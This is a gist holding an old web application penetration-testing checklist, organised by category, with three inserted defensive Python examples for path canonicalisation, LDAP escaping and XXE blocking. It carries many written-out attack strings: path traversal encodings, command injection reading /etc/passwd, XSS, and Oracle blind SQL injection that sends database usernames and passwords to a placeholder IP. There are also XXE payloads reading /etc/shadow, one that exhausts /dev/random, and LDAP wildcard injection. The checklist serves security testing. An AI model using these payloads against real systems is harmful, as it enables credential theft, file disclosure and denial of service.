Created March 20, 2019 22:54
wirepair/77501f1000ea1b5c704fdb7eabf3d825
super old pen-testing checklist
Attack Vector Checklist v1.2 Mar 23rd 2010
-----------------------------------
target site: [ ]
user accounts: [ ]
/*****************************************************************************/
/* AUTHENTICATION */
/*****************************************************************************/
1. Bypass transaction authentication by spoofing
------
[ ] Attempt modification of user supplied parameters in accessing stored data.
[ ] Attempt modification of server side parameters that are used in
    authentication checks.
2. Bypass transaction authentication by using alternate credentials/logic flows
------
[ ] Attempt unauthorized access by changing the order of specific expected
    application calls.
3. Bypass application authentication by alternate credentials
------
[ ] Submission of modified credentials to bypass or manipulate the LDAP query.
[ ] Submission of requests with modified sessions.
[ ] Submission of requests with modified session variables.
4. Bypass application authentication by directed browsing
------
[ ] Submission of URL resources observed with different roles.
[ ] Submission of URL resources as an authenticated user.
[ ] Submission of URL resources as an anonymous user.
5. Bypass authentication checks in web service calls
------
[ ] Submission of web service requests without credentials.
[ ] Submission of alternate credentials with web service requests.
6. Incremental or predictable user names
------
[ ] Identify whether usernames are incremental or otherwise predictable.
7. Bypass or manipulate application password reset functionality logic
------
[ ] If password reset takes an email address, attempt to inject a different
    e-mail address.
    Ex: real@account,another@account
    Ex: another@account.com@real@account.com
    Ex: real@account.com%0d%0aRCPT%20TO:another@account.com
8. Security question strength
------
[ ] Determine whether the same security question is asked every time until a
    successful attempt is made, or whether a random question is selected
    every time.
9. Account Lockout Functionality
------
[ ] Determine that multiple invalid login attempts (3 to 5) cause the account
    to be locked for a specified amount of time.
    Note: This should be tested at the END of the testing time frame in
    the event that a manual process is required for account unlocking.
TECHNOLOGY SPECIFIC:
======
J2EE:
[ ] Attempt to bypass VBAAC using HEAD requests to protected resources.
    Ex: HEAD /admin/adminpage.jsp?adduser=isaac HTTP/1.0
    Reference:
    www.aspectsecurity.com/documents/Bypassing_VBAAC_with_HTTP_Verb_Tampering.pdf
/*****************************************************************************/
/* ACCESS CONTROL */
/*****************************************************************************/
1. Parameter manipulation in the application
------
[ ] Modification of parameters to known good values for another role.
[ ] Add user identifier parameters to pages which do not have them.
    Ex: /userfiles.jsp?fileid=1
        /userfiles.jsp?fileid=1&userid=1
[ ] Modification of parameters to include LDAP specific characters.
[ ] Modification of parameters to include SQL specific characters.
[ ] Modification of XML requests.
[ ] Modification of web service requests.
2. Context switching
------
[ ] Check for re-use of session IDs when logging out of/into the application.
[ ] Test privileges of user roles between communities.
[ ] Verify the Proxy User ability cannot be used to proxy to unauthorized
    accounts.
3. Inherited privilege roles
------
[ ] Test creation of new roles.
[ ] Test unauthorized access to roles during the creation process.
[ ] Test for controls when granting specific data access to users.
4. Insufficient privilege dropping
------
[ ] Test the logout process for a session.
5. Cross Site Request Forgery
------
[ ] Verify the application requires a non-deterministic value when making
    requests to the system. This value cannot be a cookie and should be sent
    as a parameter.
/*****************************************************************************/
/* CONFIGURATION/ENVIRONMENT */
/*****************************************************************************/
1. Unencrypted communication channels
------
[ ] Attempt to force the application to communicate over unencrypted channels.
2. Weak password requirements
------
[ ] Attempt to set insecure passwords.
[ ] Verify the change password form requires the previous password.
3. Administrative interface access
------
[ ] Attempt unauthorized/unauthenticated connections to administrative
    interfaces.
4. Test/QA functionality
------
[ ] Review application for QA programs.
[ ] Test external services for test/QA functionality.
[ ] Test for existence of robots.txt.
5. Debug information
------
[ ] Review web pages for debug information present in source.
[ ] Search test system for accessible debug information.
6. Weak CAPTCHA implementation
------
[ ] Review CAPTCHA implementation to determine if the value is predictable.
[ ] Re-use a previously successful CAPTCHA value on a subsequent request.
[ ] Sample and analyze CAPTCHA values to determine structure and search space.
    Note: Open source tools exist for testing CAPTCHA systems:
    - PWNtcha, The Captcha Breaker, Captcha decoder, Online Captcha Decoder
7. Dangerous HTTP Verbs
------
[ ] Determine if dangerous HTTP verbs such as CONNECT, TRACE, PUT are allowed.
[ ] Attempt dangerous HTTP verbs using HTTP/1.0, and without a Host: header.
8. Default Error Pages
------
[ ] Determine if the default 4xx and 5xx error pages are viewable and leak
    information about the running environment.
/*****************************************************************************/
/* CRYPTOGRAPHY */
/*****************************************************************************/
1. Insufficient algorithmic entropy
------
[ ] Review configuration and ciphers available and used by the system.
[ ] Search for any non-standard or insecure ciphers used by the system.
2. Hard coded keys
------
[ ] Search code for accessible encryption keys.
3. Small key space
------
[ ] Review the size of keys used by the system.
4. Reflective attacks
------
[ ] Search applications for the exposure of cryptographic material.
[ ] Look for opportunities to have the system generate cryptographic
    text controlled by the attacker.
5. Insecure encryption modes
------
[ ] If it is possible to determine the cipher in use, verify insecure modes
    such as ECB mode are not in use.
/*****************************************************************************/
/* DATA EXPOSURE */
/*****************************************************************************/
1. Passwords exposed
------
[ ] Search for passwords in system scripts.
[ ] Search for passwords returned to the user in the application.
2. Accessible source code
------
[ ] Search for accessible source code on the system.
[ ] Submission of special characters through the web interface to confuse the
    web and application server into returning unprocessed source code.
[ ] Attempt direct access to config files and binaries through the external
    interfaces.
3. Verbose comments
------
[ ] Review application pages for descriptive developer comments.
4. Dead code present on system
------
[ ] Search operating system for accessible dead or backup code.
[ ] Review application pages for references to/presence of dead code.
5. Sensitive information stored unencrypted
------
[ ] Search application for sensitive information accessible in temporary
    files, log files or configuration files.
6. Verbose error messages
------
[ ] Submission of unexpected user input to generate error conditions and
    messages from the server;
[ ] Submission of incorrect login information to generate login errors;
[ ] Submission of file extensions to trigger application server specific
    error messages;
[ ] Submission of LDAP specific characters to generate LDAP error messages.
/*****************************************************************************/
/* DATA VALIDATION */
/*****************************************************************************/
1. Path traversal in file upload functionality
------
[ ] Attempt to reference specific files in header files and in
    source/destination;
[ ] Attempt to append additional files for transfer;
[ ] Attempt to modify the file request to avoid any possible filtering;
[ ] Modify requests with relative paths.
2. Path traversal in application
------
[ ] Attempt relative paths in file requests.
[ ] Attempt alternate encodings of file requests.
    Ex: Generic Traversal Attacks:
        /../../
        /./../././.././
        /....//....//
        \..\..\
        \.\..\.\.\..\.\
        \....\\....\\
    Ex: Double Encoded
        /%252e%252e/%252e%252e/
        /%252e./%252e./
        /.%252e/.%252e/
        /%252e./.%252e/
        /.%252e/%252e./
        /%%32e%%32e/%%32e%%32e/
        /%25%32e%25%32e/%25%32e%25%32e/
        /..%252f../
        /..%255c../
        /..%%35c../
        /..%%32f../
        /..%25%35%63../
        /..%25%32%66../
    Ex: Overlong Invalid UTF-8 Sequences:
        /..%c0%af../
        /..%c0%2f../
        /..%c1%9c../
        /..%c1%1c../
        /%c0%ae%c0%ae/%c0%ae%c0%ae/
        /%c0%2e%c0%2e/%c0%2e%c0%2e/
        /..%e0%80%af../
        /..%f0%80%80%af../
        /..%f8%80%80%80%af../
        /..%fc%80%80%80%80%af../
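Every encoding in the list above exists to hide a `..` segment from a filter that looks at the raw request string. The following is an added example, not part of the original checklist: a canonicalizer that decodes the way an over-permissive server might (bounded repeated percent-decoding, overlong UTF-8, backslash separators) so a filter can be checked against the whole list. The lax UTF-8 decoder is an assumption about such servers; the PAYLOADS list is constructed from the encodings above.

```python
"""Canonicalize a request path the way an over-permissive server might and
flag it when a '..' segment emerges. Added example; PAYLOADS are the
encodings from the checklist, the lax decoder is an assumption."""
from urllib.parse import unquote_to_bytes

MAX_ROUNDS = 3  # enough for single, double (%25xx) and %%32e-style encoding


def lax_utf8(data: bytes) -> str:
    """Permissive UTF-8: overlong forms (%c0%af) are accepted and every byte
    after a lead byte contributes its low 6 bits, like the lenient decoders
    the overlong payloads target. A strict decoder would reject all of them."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        n = 0                                   # leading 1 bits = sequence length
        while n < 8 and b & (0x80 >> n):
            n += 1
        if n == 0:                              # plain ASCII byte
            out.append(chr(b))
            i += 1
            continue
        if n == 1 or n > 6 or i + n > len(data):  # stray continuation / truncated
            out.append("\ufffd")
            i += 1
            continue
        cp = b & ((1 << (7 - n)) - 1)           # payload bits of the lead byte
        for c in data[i + 1:i + n]:
            cp = (cp << 6) | (c & 0x3F)         # lax: no 10xxxxxx check
        out.append(chr(cp) if cp < 0x110000 else "\ufffd")
        i += n
    return "".join(out)


def canonicalize(raw: str) -> str:
    """Decode until the string stops changing (bounded), then fold '\\' to '/'."""
    current = raw
    for _ in range(MAX_ROUNDS):
        decoded = lax_utf8(unquote_to_bytes(current))
        if decoded == current:
            break
        current = decoded
    return current.replace("\\", "/")


def is_traversal(raw: str) -> bool:
    """True when any segment of the canonical path is two or more dots only,
    which also catches the '....//' form meant to survive a single '../' strip."""
    return any(len(seg) >= 2 and seg.strip(".") == ""
               for seg in canonicalize(raw).split("/"))


# Constructed from the list above: every one must be flagged.
PAYLOADS = [
    "/../../", "/....//....//", "\\..\\..\\", "\\....\\\\....\\\\",
    "/%252e%252e/%252e%252e/", "/%%32e%%32e/%%32e%%32e/",
    "/%25%32e%25%32e/%25%32e%25%32e/", "/..%252f../", "/..%255c../",
    "/..%%35c../", "/..%25%32%66../", "/..%c0%af../", "/..%c0%2f../",
    "/..%c1%9c../", "/..%c1%1c../", "/%c0%ae%c0%ae/%c0%ae%c0%ae/",
    "/..%e0%80%af../", "/..%f0%80%80%af../", "/..%f8%80%80%80%af../",
    "/..%fc%80%80%80%80%af../",
]


def all_flagged() -> bool:
    return all(is_traversal(p) for p in PAYLOADS)


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p:28} -> {canonicalize(p)!r:16} traversal={is_traversal(p)}")
```

Run the filter under test against `canonicalize(p)` rather than `p` itself; a filter that only passes the raw strings has not been exercised at all.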
3. Command injection in application
------
[ ] Attempt to bypass filters by submitting commands as part of shell calls
    made by the application.
    Ex: ` | && ;
[ ] Attempt to change application commands in requests.
    Ex: file.pl?doc=/bin/ls|
    Ex: file.pl?dir=;cat /etc/passwd
4. XSS in web interfaces
------
[ ] Submit active script into user supplied input;
    Ex: <script>alert(123)</script>
    Ex: <%00script>alert(123)</script>
    Ex: <img src="javascript:alert(123)">
    Ex: ';alert(123);
    Ex: \';alert(123);
[ ] Attempt to bypass filters with different character encodings;
[ ] Search for scripting making direct use of user input.
    Note: This may include areas of the DOM such as document.location.href,
    window.location, document.URL etc., which can be abused by injecting
    script directly into the URI query or URI fragment.
    Ex: blah.jsp#<script>alert(document.cookie)</script>
5. SQL Injection
------
[ ] Include SQL relevant characters in user input.
    Ex: ' , " ) % %25 ' OR 1=1--
[ ] Submit valid SQL in header fields to inject into possible logging
    processes.
[ ] Submit valid SQL statements in an attempt to have the system call back
    in the event the injection vector does not return results. (Blind)
    Ex (Oracle): '+||+UTL_HTTP.REQUEST('http://<yourip>/SqlTest')||'--
6. LDAP injection in auth process
------
[ ] Include LDAP relevant characters in username, password and region fields
    for login requests;
    Ex: ' ) * | $ &
[ ] Attempt to modify LDAP queries used in authentication to match wildcards.
    Ex: uname=userA)(uid=*)
    Ex: uname=userA)(&))
    Reference:
    http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
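The two `uname=` payloads above work because the username is pasted into the filter string as-is, so its `)(` closes the template's clause and opens a new one. Added example, not from the checklist: a login filter built with RFC 4515 value escaping beside the naive concatenation, plus a clause count that shows the escaped form keeps the template's shape. The `(&(uid=...)(objectClass=person))` template is an assumption.

```python
"""Build the authentication filter with RFC 4515 value escaping so that the
wildcard / unbalanced-parenthesis payloads stay literal data. Added example;
the filter template is assumed."""

# RFC 4515 section 3: characters that must be escaped as \XX inside a value.
# The other characters in the checklist (' | $ &) are only special when they
# follow an unescaped '(' as an operator, so escaping '(' is what disarms them.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def login_filter(username: str, escaped: bool = True) -> str:
    """escaped=False reproduces the vulnerable string concatenation."""
    value = escape_filter_value(username) if escaped else username
    return f"(&(uid={value})(objectClass=person))"


def clause_count(ldap_filter: str) -> int:
    """Each unescaped '(' opens a clause; this template must always yield 3.
    After escaping, user-supplied parentheses only appear as \\28 / \\29."""
    return ldap_filter.count("(")


def injection_detected(username: str) -> bool:
    """True when the naive filter gained clauses the template did not have."""
    return clause_count(login_filter(username, escaped=False)) != 3


if __name__ == "__main__":
    for u in ("userA", "userA)(uid=*)", "userA)(&))"):
        print(login_filter(u, escaped=False), "->", injection_detected(u))
        print(login_filter(u))
```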
7. CRLF injection in web interfaces
------
[ ] Attempt to input CRLF content with user input.
[ ] Attempt injection in application redirection flows.
8. Parameter manipulation in web interfaces
------
[ ] Modify user input to modify web requests.
[ ] Modify user input to modify Location/redirection. (URL Injection)
[ ] Test edge cases for input types.
9. Code injection in any service
------
[ ] Identify possible injection points in web service, file service,
    and backend system calls through a fuzzing process.
    Ex: file.php?func=echo+hi;
    Ex: file.php?func=;system("/bin/ls");
10. CSRF in web interfaces
------
[ ] Review web interface request structure to determine if
    non-deterministic values/tokens are used in requests.
11. XML Injection
------
[ ] Include relevant XML characters in requests to the system; also attempt
    to inject unbalanced XML tags.
    Ex: <!-- < ' > ]]> <![CDATA[
    Ex (XSS):
    <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
[ ] If the application parses user supplied XML data, attempt to inject
    various invalid XML formats.
    Ex (Local file reading):
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
    Reference:
    http://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
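Both samples under item 11 are fixed on the parsing side: the local file reading sample needs the DTD refused before any entity is expanded, and the CDATA-split sample shows that the parser hands back a plain `<script>` string that must be output-encoded. Added example, not from the checklist: an expat pre-parse veto on DOCTYPE and entity declarations, followed by HTML escaping of the extracted text. The two documents are constructed from the samples above.

```python
"""Parse untrusted XML with a DOCTYPE/entity veto and show why the CDATA-split
sample still needs output encoding. Added example; the sample documents are
constructed from the checklist entries."""
import html
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    pass


def parse_untrusted(data: bytes) -> ET.Element:
    """Expat invokes these handlers before any entity is expanded, so an
    inline DTD aborts the parse instead of being honoured."""
    p = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} not allowed")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} not allowed")

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.Parse(data, True)            # structural veto pass
    return ET.fromstring(data)     # build the tree only once it passed


def is_safe(data: bytes) -> bool:
    try:
        parse_untrusted(data)
        return True
    except UnsafeXML:
        return False


def render_text(elem: ET.Element) -> str:
    """CDATA boundaries do not survive parsing: the text comes back as a plain
    '<script>' string, so it must be HTML-escaped before it is echoed."""
    return html.escape(elem.text or "")


# Constructed from the samples above.
XXE_SAMPLE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>"""

CDATA_SAMPLE = (b"<foo><![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
                b"<![CDATA[<]]>/script<![CDATA[>]]></foo>")

if __name__ == "__main__":
    print("xxe sample accepted:", is_safe(XXE_SAMPLE))
    print("rendered:", render_text(parse_untrusted(CDATA_SAMPLE)))
```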
TECHNOLOGY SPECIFIC
======
1. Web Services Testing
------
[ ] Identify any WSDL or other web service definition files.
    Ex:
    http://<webservice-host>:<port>/<servicename>
    http://<webservice-host>:<port>/<servicename>.wsdl
    http://<webservice-host>:<port>/<servicename>?wsdl
    http://<webservice-host>:<port>/<servicename>.aspx?wsdl
    http://<webservice-host>:<port>/<servicename.dll>?wsdl
    http://<webservice-host>:<port>/<servicename.exe>?wsdl
    http://<webservice-host>:<port>/<servicename.php>?wsdl
    http://<webservice-host>:<port>/<servicename.pl>?wsdl
    http://<webservice-host>:<port>/<servicename.dll>?disco
    http://<webservice-host>:<port>/<servicename.exe>?disco
    http://<webservice-host>:<port>/<servicename.php>?disco
    http://<webservice-host>:<port>/<servicename.pl>?disco
    http://<webservice-host>:<port>/axis/services/<servicename>?wsdl
    http://<webservice-host>:<port>/axis/services/<service-name>
    http://<webservice-host>:<port>/<servlets>/<servicename>?wsdl
    http://<webservice-host>:<port>/<servlets>/<service-name>
2. Cross-Site Flashing
------
[ ] Using FLARE, decompile Flash movies and determine if the following
    methods exist, as they are known to be vulnerable to XSF attacks.
    loadVariables()
    loadMovie()
    getURL()
    loadMovieNum()
    FScrollPane.loadScrollContent()
    LoadVars.load
    LoadVars.send
    XML.load ( 'url' )
    LoadVars.load ( 'url' )
    Sound.loadSound( 'url' , isStreaming );
    NetStream.play( 'url' );
    flash.external.ExternalInterface.call(_root.callback)
    htmlText
    asfunction
    *The example below assumes the URL variable is defined.
    Ex: http://victim/file.swf?URL=asfunction:getURL,javascript:alert(123);
    Reference:
    http://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OWASP-DV-004)
/*****************************************************************************/
/* DATA HANDLING */
/*****************************************************************************/
1. Buffer overflows in accessible services
------
[ ] Generate varied length strings submitted through different inputs to
    generate errors/failures in services.
2. Heap overflows in accessible services
------
[ ] Submit varied length strings for user supplied data to surface any
    error/failure in services.
3. Format string attacks in accessible services
------
[ ] Submit format strings to services to generate error conditions.
    Ex: %x %25x %p %04d
4. Alternate character encodings
------
[ ] Submit data with different character encodings to bypass filtering.
5. Data truncation
------
[ ] Submit varied length strings to filtered content to check for proper
    validation and truncation processes.
6. Integer overflows/underflows
------
[ ] Submit edge cases for integer values to surface any potential integer
    overflow/underflow conditions in the application logic.
    Ex: 128, 129, 256, 257, 32768, 32769, 65536, 65537, 2147483648, 2147483649,
        4294967296, 4294967297
    Reference (C type ranges, long shown as 32 bits):
    signed char          -128                  127
    unsigned char        0                     255
    short                -32768                32767
    unsigned short       0                     65535
    int                  -2147483648           2147483647
    unsigned int         0                     4294967295
    long                 -2147483648           2147483647
    unsigned long        0                     4294967295
    long long            -9223372036854775808  9223372036854775807
    unsigned long long   0                     18446744073709551615
/*****************************************************************************/
/* ERROR REPORTING */
/*****************************************************************************/
1. DB errors exposed
------
[ ] Modify user supplied input to include erroneous DB input.
2. Stack traces returned to the user
------
[ ] Modify user input and look for stack traces in error messages, header
    parameters or in page source returned to the user.
3. System errors exposed to the user
------
[ ] Review error messages returned to the user for the presence of system error
    messages.
4. Authentication error messages
------
[ ] Review failed login attempts for descriptive error messages.
/*****************************************************************************/
/* SESSION MANAGEMENT */
/*****************************************************************************/
1. Session fixation attacks
------
[ ] Attempt to preset the session in the login call;
[ ] Attempt to preset the session in a cookie;
[ ] Attempt to preset the session in parameters.
2. Insecure cookie creation
------
[ ] Review all cookie creation calls from the server.
3. Insecure cookie usage
------
[ ] Validate cookie information is not used in displaying content back to the
    user.
    - Add cookie to URI (URL rewriting format):
      /file.jsp;errcookie=<script>alert(123)</script>
4. Session IDs predictable
------
[ ] Sample and analyze session IDs for randomness in the session ID creation
    process.
    *Burp Sequencer has a decent tool built in for session ID analysis.
5. Session IDs searchable
------
[ ] Sample and analyze session IDs to determine structure and search space.
6. Long lived session IDs
------
[ ] Attempt to reuse sessions at 30 min, 1 hour and 24 hour intervals.
7. Insecure logout functionality
------
[ ] Determine if the session is deleted server side as well as client side.
    (Intercept the logout page and remove the Set-Cookie header which is
    attempting to nullify the value.)
+-----------------------------------------------------------------------------+
|                           VARIOUS ATTACK STRINGS                            |
+-----------------------------------------------------------------------------+
==========================SQL Injection (Oracle)===============================
Get table info:
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Get column info of a specific table:
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Get database name:
SELECT name FROM v$database
Get the name of the database we are currently in:
SELECT global_name FROM global_name
Get the database usernames and passwords:
SELECT username,password FROM dba_users;
Get the database server version information:
SELECT banner||'-'||(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')
FROM v$version WHERE banner LIKE 'TNS%'
Similar to above:
SELECT product FROM product_component_version
SELECT version FROM product_component_version
Get the current database user:
SELECT user FROM dual
Same as above:
SELECT username FROM v$session WHERE audsid=sys_context('userenv','SESSIONID')
AND rownum=1
Search for a specific table name using the LIKE keyword:
(Search for a table that contains ...AUTH...)
SELECT table_name FROM dba_tab_columns WHERE table_name LIKE '%25AUTH%25'
For Blind Oracle SQL Injection:
When using UTL_HTTP.REQUEST you must have an HTTP server running on
your machine to log the results.
Get user:
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select
concat(username,password) from dba_users))||'--
Same as above but using || to concatenate instead of concat():
'+||+UTL_HTTP.REQUEST('http://ip.ip.ip.ip/sql.php?SQL='||(select
ID||':'||PWD from TABLE where rownum=1))||'--
==============================XML Injection=====================================
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<foo>
<![CDATA[' or 1=1 or ''=']]>
</foo>
External Entity Inclusion 1:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file://c:/boot.ini">]>
<foo>&xxe;</foo>
External Entity Inclusion 2:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////etc/passwd">]>
<foo>&xxe;</foo>
External Entity Inclusion 3:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////etc/shadow">]>
<foo>&xxe;</foo>
External Entity Inclusion 4: BE CAREFUL, THIS WILL DOS THE SYSTEM!
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:////dev/random">]>
<foo>&xxe;</foo>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
TODO: Add More...